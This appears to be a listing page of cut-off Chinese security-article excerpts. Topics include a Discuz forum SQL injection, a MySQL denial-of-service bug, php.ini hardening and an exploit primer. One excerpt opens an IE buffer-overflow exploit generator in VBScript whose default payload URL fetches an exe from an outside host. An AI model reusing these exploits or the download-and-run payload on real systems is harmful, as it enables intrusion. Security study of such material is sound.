2020-02-16 标签:php,小心,urldecode,引发,sql,注入,漏洞,ihipop,学校的,discuz,x,论坛,被黑,在那里,下午,google,n

Ihipop 学校的 Discuz X1.5 论坛被黑，在那里吵了一个下午。Google 一下“Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit”，你就知道。 Discuz 是国内很流行的论坛系统，被黑的网站应该会很多吧。不过我

2020-02-16 标签:mysql,45,修改,拒绝服务,漏洞,possibly,affected,kristian,erik,hermansen,credit,joe,gallo,alter,permissions,exploit,bug

mysql 5.0.45 （修改）拒绝服务漏洞 /* * MySQL mysql> Create TABLE `test` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, `foo` text NOT NULL ) E

2020-02-16 标签:生成器,ms,internet,explorer,xml,parsing,buffer,overflow,exploit,vista,day,code,lcx,error,resume,next,exeurl

'code by lcx On Error Resume Next Exeurl = InputBox( "请输入exe的地址：", "输入", "http://www.haiyangtop.net/333.exe" ) url="http://www.metasploit.com:55555/PA

2020-02-16 标签:php,ini,启用,disable,functions,提高,安全,q,i,run,a,small,apache,based,webserver,personal,use,shared,friends,family

Q. I run a small Apache based webserver for my personal use and it is shared with friends and family. However, most script kiddie try to exploit php a

2020-02-16 标签:对错,漏洞,exploits,的说,作者,mark,vogels,翻译,s,t,在这,文档,我将,会试,为你

作者：Mark Vogels翻译：黯魂[S.S.T]在这篇文档中，我将会试着为你提供一个对于错误，和由于那些错误而产生的漏洞以及它们的exploits的基本认识。那决不意味着能让你完全理解exploits和漏洞，但是能帮助你学会认识可能的漏洞以及怎样处理它们。一般而言有3种不同类型的错误会可能危及计